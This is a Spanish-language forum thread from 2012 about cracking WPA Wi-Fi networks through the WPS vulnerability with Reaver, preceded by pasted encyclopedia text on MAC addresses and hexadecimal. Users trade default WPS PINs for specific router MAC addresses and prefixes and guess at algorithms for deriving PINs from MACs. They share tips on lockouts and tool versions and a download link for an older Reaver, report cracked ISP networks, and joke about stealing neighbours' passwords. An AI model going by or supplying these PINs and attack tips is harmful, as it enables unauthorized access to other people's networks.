En las redes de computadoras, la dirección MAC (siglas en inglés de media access control; en español "control de acceso al medio") es un identificador de 48 bits (6 bloques hexadecimales) que corresponde de forma única a una tarjeta o dispositivo de red. Se conoce también como dirección física, y es única para cada dispositivo. Está determinada y configurada por el IEEE (los últimos 24 bits) y el fabricante (los primeros 24 bits) utilizando el organizationally unique identifier. La mayoría de los protocolos que trabajan en la capa 2 del modelo OSI usan una de las tres numeraciones manejadas por el IEEE: MAC-48, EUI-48, y EUI-64, las cuales han sido diseñadas para ser identificadores globalmente únicos. No todos los protocolos de comunicación usan direcciones MAC, y no todos los protocolos requieren identificadores globalmente únicos.

Las direcciones MAC son únicas a nivel mundial, puesto que son escritas directamente, en forma binaria, en el hardware en su momento de fabricación. Debido a esto, las direcciones MAC son a veces llamadas burned-in addresses, en inglés.
Si nos fijamos en la definición como cada bloque hexadecimal son 8 dígitos binarios (bits), tendríamos:

6 * 8 = 48 bits únicos

En la mayoría de los casos no es necesario conocer la dirección MAC, ni para montar una red doméstica, ni para configurar la conexión a internet, usándose esta sólo a niveles internos de la red. Sin embargo, es posible añadir un control de hardware en un conmutador o un punto de acceso inalámbrico, para permitir sólo a unas MAC concretas el acceso a la red. En este caso, deberá saberse la MAC de los dispositivos para añadirlos a la lista. Dicho medio de seguridad se puede considerar un refuerzo de otros sistemas de seguridad, ya que teóricamente se trata de una dirección única y permanente, aunque en todos los sistemas operativos hay métodos que permiten a las tarjetas de red identificarse con direcciones MAC distintas de la real.

Eso quiere decir que puedes pasar los octetos a decimal...

Sistema hexadecimal

El sistema numérico hexadecimal o sistema hexadecimal (a veces abreviado como Hex, no confundir con sistema sexagesimal) es un sistema de numeración que emplea 16 símbolos.

(http://upload.wikimedia.org/wikipedia/es/math/0/2/b/02b5638b774f8fd3248b37829dc58f47.png)

Se debe notar que A = 10, B = 11, C = 12, D = 13, E = 14 y F = 15. En ocasiones se emplean letras minúsculas en lugar de mayúsculas. Como en cualquier sistema de numeración posicional, el valor numérico de cada dígito es alterado dependiendo de su posición en la cadena de dígitos, quedando multiplicado por una cierta potencia de la base del sistema, que en este caso es 16. Por ejemplo: 3E0A16 = 3×163 + E×162 + 0×161 + A×160 = 3×4096 + 14×256 + 0×16 + 10×1 = 15882.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: El_Andaluz en 21 Agosto 2012, 00:49 am
Haber si ampliamos mas los datos sobre todo en los ejemplo por que adivinos no somos, por el que pones en este ejemplo que se que lo has copiado de alguna pagina yo lo vi también en otra pagina y no entendi mucho pero aora creeo que lo estoy entiendo un poco mas con lo tu has explicado arriba pandemoniun :
Por ejemplo: 3E0A16 = 3×163 + E×162 + 0×161 + A×160 = 3×4096 + 14×256 + 0×16 + 10×1 = 15882  ¿ De donde sacas el 163,162,161y160 por que 256 sale sale de multiplicar 16 x 16 =256 o no sale de hay ? contesta pandemonium por favor .


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: GOolden en 21 Agosto 2012, 01:04 am
elsevi pillas alguna fte por tu zona


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: El_Andaluz en 21 Agosto 2012, 01:16 am
P4nd3m0n1um : El ejemplo que tienes puesto abajo esta mal corrige lo tu por que yo lo tengo de otra forma .


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: adrihamel en 21 Agosto 2012, 01:18 am
elsevi estoy utilizando el wpscrackgui 1.1.8 de wifislax 4.2 y para las redes 00:19:15 que es la que estabas buscando pues a parte del pin 6463 que pusistes segun la base de datos hay otro empieza por 6602 los otros 4 te los pongo por privado.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: El_Andaluz en 21 Agosto 2012, 01:22 am
adrihamel si he utilizado el wpscragui pero de esa mac no era tio era de esta 00:19:70 la mac 00:19:15 Yo se que el pin es :12345670 la que quiero averiguar es el pin exacto de mi mac y voy hacer una cosa desisfrarla segun dice  pandemonium que por cierto no te has explicado bien lo demas dimelo por pribado porfa esque me estoy haciendo ya un lio con esto quiero pensar como sacar el pin de mi mac segun eso yo conozco gente que han sacado clave por defecto asin .


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: adrihamel en 21 Agosto 2012, 01:33 am
elsevi no me ekivoke es de orange-xxxx con mac 00:19:70 (me salio la otra solo) e puesto en la base de datos la mac 00:19:70 y pone que el pin es 12345670 o 6463 o 6602 pero yo cuadno saque la mia salia otr pin asique esto de la base de datos esta un poco desactualizada. Prueba el pin que te e dejado por privado qu es de la orange-xxxx 00:19:70 mira ver si ai suerte y perdon por el fallo


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: El_Andaluz en 21 Agosto 2012, 01:50 am
NO pasa nada por el fallo  nadie es perfecto , el pin12345670 es siempre es con el que prueba la mayoria y solo valio para un cierta mac que era la 00:19:15 para la 00:19:70 valdra o no dependiendo de la zona o del pais en ESpaña sera otros pines como los que tu me has dado pero claro hay ya tanto que el mi direccion mac ya no se cual es por que probe  casi todo menos los  dos ultimos que tu me diste y no me valen para nada no me saca la  clave el ultimo que tu me tu me has dado lo probare cuando se desbloque el router y el otro que tu sacaste la clave lo probe y nada de nada . respondeme por  pribado que si no me pierdo.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 21 Agosto 2012, 02:45 am
Haber si ampliamos mas los datos sobre todo en los ejemplo por que adivinos no somos, por el que pones en este ejemplo que se que lo has copiado de alguna pagina yo lo vi también en otra pagina y no entendi mucho pero aora creeo que lo estoy entiendo un poco mas con lo tu has explicado arriba pandemoniun :
Por ejemplo: 3E0A16 = 3×163 + E×162 + 0×161 + A×160 = 3×4096 + 14×256 + 0×16 + 10×1 = 15882  ¿ De donde sacas el 163,162,161y160 por que 256 sale sale de multiplicar 16 x 16 =256 o no sale de hay ? contesta pandemonium por favor .

son los bits, esto se ve en la primaria..  :laugh: :laugh: :laugh: :laugh:

3E0A16 = 3×163 + E×162 + 0×161 + A×160 = 3×4096 + 14×256 + 0×16 + 10×1 = 15882..

P4nd3m0n1um : El ejemplo que tienes puesto abajo esta mal corrige lo tu por que yo lo tengo de otra forma .

para eso y mucho más.. http://es.wikipedia.org/wiki/Sistema_hexadecimal (http://es.wikipedia.org/wiki/Sistema_hexadecimal)

dimelo por pribado porfa esque me estoy haciendo ya un lio con esto quiero pensar como sacar el pin de mi mac segun eso yo conozco gente que han sacado clave por defecto asin .

privadito, privadito...
pásame la contraseña de tu vecinito..

simple, priensa, razona, busca una manera lógica de resolverlo. Hex, SHA1, MD5, sumar, restar, multiplicar, hay muchas formas

pero yo cuadno saque la mia salia otr pin asique esto de la base de datos esta un poco desactualizada.

y si no aportan pines.. privadito..

respondeme por  pribado que si no me pierdo.

privado! privadito...


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: El_Andaluz en 21 Agosto 2012, 02:51 am
son los bits, esto se ve en la primaria..    

3E0A16 = 3×163 + E×162 + 0×161 + A×160 = 3×4096 + 14×256 + 0×16 + 10×1 = 15882.. jajaja pero tu no lo has puesto bien  yo lo he descubierto antes de tu ponerlo por que si no lo entendía y lo hacemos por privado espero que no sea nada malo porque estamos intentando buscar un algoritmo para hacer una gui y yo quiero aportar datos los pines que hemos dado son de amigos nuestro para nada es del vecino por lo meno los mio quien te dice a ti que mi vecino me di a mi el pin para yo hacer un algoritmo no desviemos el tema. Pero haber habra muchas forma yo ya lo echo varias forma de sacar la clave por conversores  y el pin a mi no me sale en la mac que yo quiero por que siempre tiene letra entre los numero lo echo el ejercicio primero me viene bien por que voy hacer un grado medio de informatica y me vendria bien saber como desisfrar la clave por defecto pero necesito ayuda para poder sacar algun diccionario.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: El_Andaluz en 21 Agosto 2012, 03:03 am
adrihamel tu pin no sale en la base de datos por que tendras que meterla tu para que se actualice solo creeo yo verdad asin la proxima vez que le de al pin saldra esa y mas pines a mi demomento no me sirven tendra otro pin como el router cambiar el  pin rapido cada vez que le ataca por wps .


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 21 Agosto 2012, 04:01 am
Otro:

MODELO: KOZUMI
MAC: 00:26:CE:11:84:44
PIN: 11480044

y el 48 lo podes sacar con el 26... 2-6=4 2+6=8...


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: El_Andaluz en 21 Agosto 2012, 04:17 am
 P4nd3m0n1um: Yo me he llevado toda la noche a mi solo me sale los pin con los que tu has puesto despues con mi mac no me sale voy hacer una cosa haber si es verdad que eres capaz de hacerlo te voy a poner aqui una mac que creeo que tu no sabes ni el pin haber si eres capaz que te parece te atraves .  por que a mi no me sale  bien sera por que hago algo mal calculando verdad mira este por ejemplo: 00:19:70:82:A7:A1 le quitamos los 6 primeros dígitos según tu 82A7A1 separamos los 3 primeros dígitos quedaría asín:82A 7A1 entre el primero sumamos los digitos segun tu 8+2+7+10=27

pin=NO tengo ni idea  seria aora esto sumamos los primero del segundo 7+10+1=18

serian asin : 82102718 esto estaria mal verdad no se me lio. explicamelo haber si a ti te sale yo creeo que tu te lo pones facil.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 21 Agosto 2012, 05:44 am
P4nd3m0n1um: Yo me he llevado toda la noche a mi solo me sale los pin con los que tu has puesto despues con mi mac no me sale voy hacer una cosa haber si es verdad que eres capaz de hacerlo te voy a poner aqui una mac que creeo que tu no sabes ni el pin haber si eres capaz que te parece te atraves .  por que a mi no me sale  bien sera por que hago algo mal calculando verdad mira este por ejemplo: 00:19:70:82:A7:A1 le quitamos los 6 primeros dígitos según tu 82A7A1 separamos los 3 primeros dígitos quedaría asín:82A 7A1 entre el primero sumamos los digitos segun tu 8+2+7+10=27

pin=NO tengo ni idea  seria aora esto sumamos los primero del segundo 7+10+1=18

serian asin : 82102718 esto estaria mal verdad no se me lio. explicamelo haber si a ti te sale yo creeo que tu te lo pones facil.

puede ser, dije que no es igual con todas las MAC, Routers, Modelos, Series, etc!


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: El_Andaluz en 21 Agosto 2012, 18:03 pm
haz el que yo echo arriba haber si a ti te sale igual y por que dices que con todas las mac no se puede hacer por que las letras tienen un valor se supone que se podria hacer con cualkier mac verdad o no con esto se puede sacar un algoritmo con todas las mac que empieze  por 00:19:70.mas lo que sigue pregunto ?


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: adrihamel en 21 Agosto 2012, 18:11 pm
elsevi te voy a dar una mac para que tu saques el pin como con la otra que as echo tu yo ya tengo la clave y el pin pro quiero ver si cuadno u lo haces sale el mismo pin que tengoyo va? a ver es una onoxxxx con mac C4:3D:C7:40:FF:3E cuando saques el pin te mando el pin que me dio a mi el reaver y con ella la clave salu2


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: El_Andaluz en 21 Agosto 2012, 19:11 pm
 raultenerife no entiendo mucho lo de hacer libros de interne sirve para pornerlo en el wifislax4.2 el wifiway3.4 ya se ha kedado muy antiguo para mi se podria dime de todas manera servira  de algo ??


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: GOolden en 22 Agosto 2012, 11:09 am
hola estaba sacando una orange llamada fte con esta mac 80:B6:86 que son las nuevas de orange y iva por el 49% iva todo muy bien y de repente me sale este error [!] WARNING: Receive timeout occurred
  • Sending EAPOL START request
  • [!] WARNING: Receive timeout occurred
  • Sending EAPOL START request y ya no cambia de pin ni nada lo he intentado ya varias veces y nada que opinais saludos


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: FeR!__ en 22 Agosto 2012, 13:09 pm
hola estaba sacando una orange llamada fte con esta mac 80:B6:86 que son las nuevas de orange y iva por el 49% iva todo muy bien y de repente me sale este error [!] WARNING: Receive timeout occurred
  • Sending EAPOL START request
  • [!] WARNING: Receive timeout occurred
  • Sending EAPOL START request y ya no cambia de pin ni nada lo he intentado ya varias veces y nada que opinais saludos
Parece que se perdió la señal, es posible que apagara el router. En mi caso estoy atascado con las 8C:0C:A3


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: GOolden en 22 Agosto 2012, 13:26 pm
no fer el router esta encendido t ese router que estas atrancado es muy jodido nadie lo ha consigo algo llevan los routers esos que se quedan atrancados en 99% pero en mi caso es my raro no se que puede ser y el router esta encendido


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: capitanfanegas en 22 Agosto 2012, 23:41 pm
 :rolleyes: ..8c:0c:a3:x:x:x, es otro router de telefonica, invulnerable, verificado con wifislax 4.2, y wifiway 3.4, llega hasta el 99.99% y a partir de ahí repite indefinidamente el mismo pin, todo esto a efectos de información, porque no puedo aportar nada más que lo que he experimentado, saludos que siga la investigación... ;-)


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: FeR!__ en 23 Agosto 2012, 01:05 am
Si bueno, ya había leído que por ahora es impenetrable y así es, el 2º ataque reaver que le lanzo y nada, 99,99% así que habrá que esperar.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 23 Agosto 2012, 02:24 am
:rolleyes: ..8c:0c:a3:x:x:x, es otro router de telefonica, invulnerable, verificado con wifislax 4.2, y wifiway 3.4, llega hasta el 99.99% y a partir de ahí repite indefinidamente el mismo pin, todo esto a efectos de información, porque no puedo aportar nada más que lo que he experimentado, saludos que siga la investigación... ;-)

cambiaste la versión de reaver?


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: GOolden en 23 Agosto 2012, 10:45 am
hola a todos he detectado una wlan_xxxx y es de telefonica con esta mac 50:67:f0 y lo curioso esque no tiene el wps activo sabeis algo de esta red saludos


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: capitanfanegas en 23 Agosto 2012, 14:23 pm
cambiaste la versión de reaver?

Wifislax 4.2 tiene la versión más actualizada, qué necesidad hay de cambiar?  Estos son los superouter de tfnica, que deben haber parcheado la vulnerabilidad del wps, supongo, es que hay algo más nuevo que el reaver 1.4???


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: GOolden en 23 Agosto 2012, 14:43 pm
capitanfanegas que redes has sacado con reaver


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 24 Agosto 2012, 06:20 am
Wifislax 4.2 tiene la versión más actualizada, qué necesidad hay de cambiar?  Estos son los superouter de tfnica, que deben haber parcheado la vulnerabilidad del wps, supongo, es que hay algo más nuevo que el reaver 1.4???

si estarian parcheados no los verias con el wps activo. Deberias probar la v1.3 ya q en esa no se qda en 99%


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: El_Andaluz en 24 Agosto 2012, 13:13 pm
Haber si hay router que son casi imposible de sacar como las orange y algunas mas dudo que lo podamos sacar con el 1.3 del reaver y menos las orange la única forma como dijo un chabal aqui creo que a mi todavía por cierto no me ha servido es cuando se keda bloqueado contar las horas y los días para que se desbloque el router y se vuelva a actualizar solo y aprovechar el momento para volver atacarlo otra vez se supone que en ese momento el router estaría un poco debilitado claro hay que meterle el pin correto eso es el royo del reaver y todo lo parecido al reaver .


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: kaiserr en 24 Agosto 2012, 17:03 pm
EDITADO

Me equivoque de tema XD disculpar este comentario.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: carrrca en 24 Agosto 2012, 19:13 pm
si estarian parcheados no los verias con el wps activo. Deberias probar la v1.3 ya q en esa no se qda en 99%


Yo he probado una red con revar 1.3 y 1.4 y con los dos se queda en 90,90% y varias veces.
¿Por que puede ser eso?¿por que repite el mismo pin hasta que ya lo deja por imposible?


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: capitanfanegas en 24 Agosto 2012, 22:46 pm
capitanfanegas que redes has sacado con reaver

Las wlan_xxxx con Mac Dc:0B:1A:XX:XX:XX, sí, es vulnerable, las 8C:0C:A3:XX:XX:XX, creo que no.

En cuánto al reaver 1.3, no sé como instalarlo en live usb,saludos.

P.D. Buscaré un link que lo explique pero supongo que cada vez que inicias de nuevo, tienes que reinstalar el reaver 1.3 porque el que viene por defecto es el 1.4, en las versionas más recientes de wifislax y wifiway, saludos.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: alevele en 25 Agosto 2012, 01:51 am
hola, como se mete la sesion guardada del reaver en la carpeta "modules"? . intento guardar el ataque y me dice que no es posible guardar el archivo  :huh:, tambien lo eh intentado en la de"base" y lo mismo no se.
utilizo el CD-LIVE.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 25 Agosto 2012, 07:32 am
hola, como se mete la sesion guardada del reaver en la carpeta "modules"? . intento guardar el ataque y me dice que no es posible guardar el archivo  :huh:, tambien lo eh intentado en la de"base" y lo mismo no se.
utilizo el CD-LIVE.


q CD-Live?


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: carrrca en 25 Agosto 2012, 10:05 am
hola, como se mete la sesion guardada del reaver en la carpeta "modules"? . intento guardar el ataque y me dice que no es posible guardar el archivo  :huh:, tambien lo eh intentado en la de"base" y lo mismo no se.
utilizo el CD-LIVE.


En CD-LIVE no se puede hacer eso,el cd no te permite guardar cosas ya dentro de el. Si lo utilizaras en un USB si. Te lo recomiendo, es mejor ya que puedes ponerte nuevas aplicaciones o desinstalar aplicaciones por otras que estan actualizadas.Eso en el cd no lo puedes hacer


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: carrrca en 25 Agosto 2012, 10:28 am

En cuánto al reaver 1.3, no sé como instalarlo en live usb,saludos

para instalar el reaver 1.3 en un usb descargatelo de aquí:

http://uploading.com/files/f96mmfb1/solucion%2Breaver%2B1.3.rar/

lo descomprimes y sustituyes el modulo 6 de la carpeta base y le añades los otros modulos.
Asi eliminas el reaver 1.4 e instalas el reaver 1.3


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: GOolden en 25 Agosto 2012, 10:34 am
carrrca que redes has sacado con reaver


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: carrrca en 25 Agosto 2012, 10:38 am
carrrca que redes has sacado con reaver
Vodafone, Jazztel y Wlan. No he probado mas, es una herramienta muy practica. Eso si, hay que tener mucha paciencia


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: alevele en 25 Agosto 2012, 15:07 pm
q CD-Live?
utilizo el de wifiway, se me olvido ponerlo


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: alevele en 25 Agosto 2012, 15:14 pm
javascript:void(0);
En CD-LIVE no se puede hacer eso,el cd no te permite guardar cosas ya dentro de el. Si lo utilizaras en un USB si. Te lo recomiendo, es mejor ya que puedes ponerte nuevas aplicaciones o desinstalar aplicaciones por otras que estan actualizadas.Eso en el cd no lo puedes hacer
antes lo tenia en en el usb pero lo perdi!!. no hay posibilidad de guardarlo con CD-LIVE ?


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: 82naros en 26 Agosto 2012, 03:34 am
Se puede quedar un router bloqueado(wps) para siempre?yo es que llevo un mes con el mio de orange bloqueado,xo si yo mismo le doy al botoncito hago trampas.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: El_Andaluz en 26 Agosto 2012, 04:24 am
Para siempre no creo que se quede bloqueado el router el bloqueo se supone que es temporal hasta que lo actulices verdad, yo llevo meses intentando sacar la clave de estos router es casi imposible y mas si la clave esta cambiada y no es la que viene por defecto , lo comprobe por mi mismo en el router de un amigo con el permiso del el claro esta y nada de nada la clave cambiada y yo no lo sabia ni metiendole el pin me daba la clave se kedaba bloqueado.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: 82naros en 26 Agosto 2012, 05:34 am
Muchas gracias elsevi,pero yo con las orange me doy por vencido hasta q salga algo nuevo.

sabes algo de las Jazztel_xx wpa2,creo q no vienen con wps activado, y la clave es de 8 digitos comprendidos del 9-0 y de la A-Z y por lo q e leido el primer digito es C.
pero con esos datos no es suficiente.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: El_Andaluz en 26 Agosto 2012, 05:50 am
LA VERDAD que de las JAZZTEL:XX no se mucho pero no sabia que tenia ese tipo de seguridad y menos JAZZTEL_XX eso creo que es ya antiguo verdad yo las que conozco son asin JAZZTEL_XXXX y si son wpa2 estas redes nunca tienes WPS activado o por lo menos yo demomento no he visto ninguna que tenga el wps activado demomento lo unico que se por lo que he leiido en otros foros de estas jazztel que tu dices es esto : La clave es de 8 cifras de A-Z y el segundo caracter siempre es un numero !! quedando así: X6XXXXXX , X2XXXXXX, X8XXXXXX etc.... y  no es A-F  SINO  a-f en minusculas.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: GOolden en 26 Agosto 2012, 17:10 pm
habes sacado algun livebox 2 o livebox son redes de orange habeis sacado alguna


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: El_Andaluz en 26 Agosto 2012, 17:17 pm
GOolden: Yo demomento no he sacado nada ningun livebo2 ni livebox 1 de orange estas demomento estan complicado yo estoy intentando recojer datos de las orange nada mas si tu tienes algunos datos mandamelo por privados yo lo he intentado con diccionario y nada de nada estas claves normalmente estan cambiada nadie deja la clave por defecto .


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: GOolden en 26 Agosto 2012, 17:19 pm
pero elsevi pero tienes todavia el bloqueo del router aqui uno saco una orange en el foro


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: El_Andaluz en 26 Agosto 2012, 17:23 pm
si yo se que uno saco una orange-xxxx pero eso ha sido suerte yo lo conozco y me explico por aqui como lo hizo yo demomento he echo ese metodo que el dices y no saco nada tio unos de eso router lleva ya bloqueado unos 5 dias y no puedo hacerle el ataque como yo quiero se lo he echo a otro router de mis amigos y nada con su permiso claro.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: GOolden en 26 Agosto 2012, 17:37 pm
estos routers tienen un pin de defecto para todo ono o estoy equivocado de que fabricante son los routers que estas atacando y la mac


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: El_Andaluz en 26 Agosto 2012, 18:17 pm
los que yo estoy atacando so de lievebox sagem algunos y otros livebox 2 livebox normal si estos routers tienen un pin por defecto como tu dices pero ese pin creo que se cambia solo cuando cambias la clave del router o que lo cambies tu personalmente claro la mac que yo ataco es esta 00:19:70 tengo unas cuantas de estas demomento no he sacado la clave con el reaber estoy esperando uno de estas mac que se desbloque solo pero llevo ya 5 dias esperando y nada.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: 82naros en 27 Agosto 2012, 17:42 pm
alguien me puede pasar algun pin de orangexxxx con mac C0:AC:54(por privadao)
gracias


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 27 Agosto 2012, 18:40 pm
privadito.. privadito..

tengo 3 edimax 3g-6200n con

Código:
00:1f:1f:##:##:##    pin: 85521162 (por defecto, no se puede generar ni cambiar el pin)
00:1f:1f:82:7e:be    pin: 85521261
00:1f:1f:82:87:d0    pin: 85544482


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: 82naros en 27 Agosto 2012, 19:54 pm
muchas gracias,pero el pin que busco es de router sagem


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: adrihamel en 29 Agosto 2012, 02:47 am
Buenas noches gente siento no aver comentado durante este tiempo he estado liado con algunas redes... e sacado una onoxxxx con mac 2C:B0:5D con pin 9382 y la clava es de 10 digitos en los cuales 7 son del pin y queda asi x9382XXXxx y es un router netgear 50 megas pero si lguien me podria atudar porque cuando hago un test me da 9 megas de bajada? pienso que estos routers tienen que tener 30 o 50 megas pero en el router nose donde esta ya he mirado en todos los dados y para GOolden:
e estado haciendo pruebas con una vodafonexxxx con mac 5C:4C:A9 y ya se el pin completo te lo dejo por privado pero cuando lo pruebo pues pone M2 M4 M6 y pone key cracked in 19 seconds wps pin: xxxxxxxx nothing done, nothing to save pero no me da la clave pero yo se que el pin es ese porque pone eso y cuando lo vuelvo a intentar ues solo me sale el pin a que cres que se deve? salu2
p.d. si me dijeseis como subir fotos a este foro pues os pndria algunas que e echo satisfactoriamente


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 29 Agosto 2012, 03:41 am
Código:
00:22:3F:6A:5E:F8 NETGEAR 48247818


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: GOolden en 29 Agosto 2012, 13:13 pm
adrhamel dejalo que vallla solo desde el princio por que ese no es el pin dame mas detalles saludos


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 29 Agosto 2012, 18:13 pm
adrhamel dejalo que vallla solo desde el princio por que ese no es el pin dame mas detalles saludos

eso va a depender siempre.. tiene q ser casualidad de q sea el mismo pin.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: adrihamel en 29 Agosto 2012, 18:30 pm
GOolden yo ese pin le busque en el wpscrackgui del wifislax 4.2 y i esta ai sera porque a alquen le a servido no?  :laugh: :laugh: pero yo penso y razono cuando meti el pin a los 20 segundos me dice key cracked wps pin: 8440XXXX y pone KEY CRACKED o sea que la clave a sido "descidrada" pero no aparece solo pone eso y nothing done, nothing to save yo pienso que si fuese otro pin se pondria en 90% no creeis? y mandaria un M6 como que a encontrado los 4 primeros numeros no? GOolden tu que pin as usado para estas redes?


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: adrihamel en 29 Agosto 2012, 18:33 pm
Lo mejor es dejarlo 6 horas o 10 horas y que solo encuentre el pin sin ponerle nada asi es la unica manera de sacarla siempre y cuando no se bloque el router o cambie de pin solo como me paso a mi con una...


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: adrihamel en 29 Agosto 2012, 18:35 pm
Alquien sabe si los router de onoXXXXXX wpa2 tienen el wps activado? estoy intentando con una E0:69:95 pero a los dos pines que lanza se bloqea.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: pakomor en 29 Agosto 2012, 19:32 pm
adrihamel puedes pasarme el pin de vodafone 5C:4C:A9???
aqui pillo una de esas y te comento si pasa lo mismo que a ti!!!


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: GOolden en 29 Agosto 2012, 20:31 pm
adrihamel yo no he sacado todavia ninguna de estas redes estoy ahora con una vodafone con esta mac 64:16:f0 y el proceso va lento alguien ha sacado esta red saludos


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: kaiserr en 30 Agosto 2012, 00:05 am
Podriais montar un mercadillo de pin's ... cada hora que se haya tardado en sacar el pin 1 euro.
 :¬¬


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: El_Andaluz en 30 Agosto 2012, 01:28 am
Aqui se maneja muchos pines pero yo nunca saco nada de wpa2  :xD :xD :xD joder como estemos por cada hora que tardemos un euro el pin nos forramos jajaja


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: adrihamel en 30 Agosto 2012, 01:47 am
adrihamel puedes pasarme el pin de vodafone 5C:4C:A9???
aqui pillo una de esas y te comento si pasa lo mismo que a ti!!!
claro el que yo probe me ponia key cracked in 19seconds pero la clave no me lo da pero el pin tiene que ser ese porque sino se pondria en 90% te lo doy por privado y a ver si conseguimos algo salu2


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: adrihamel en 30 Agosto 2012, 01:50 am
sabeis si existe algun pin o algo para las redes de Vodafonexxxx con mac 00:24:d2? tienen el wps activado pero cuando lanzo el reaver intenta todo el rato el mismo pin 1245670 y no avanza y pone 0.00% complete y se queda hay alquien sabe algo?


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 30 Agosto 2012, 04:39 am
ahi, hay ¡ay! q chipset tienes y bajo q os has probado?


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: adrihamel en 30 Agosto 2012, 04:56 am
por fin cojo buenos megas con onoxxxx wpa2 solo tenia qe cambiar el canal al 13 y ponerle en modo 802.11 a 300mbps y e pasado de cojer 8 o 10 megas con el canal automatico y a 145mbps a cojer casi los 40 megas con el canal 13 y a 300mbps y solo por wifi asique supongo que trendra los 50 megas contratados.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: El_Andaluz en 31 Agosto 2012, 00:04 am
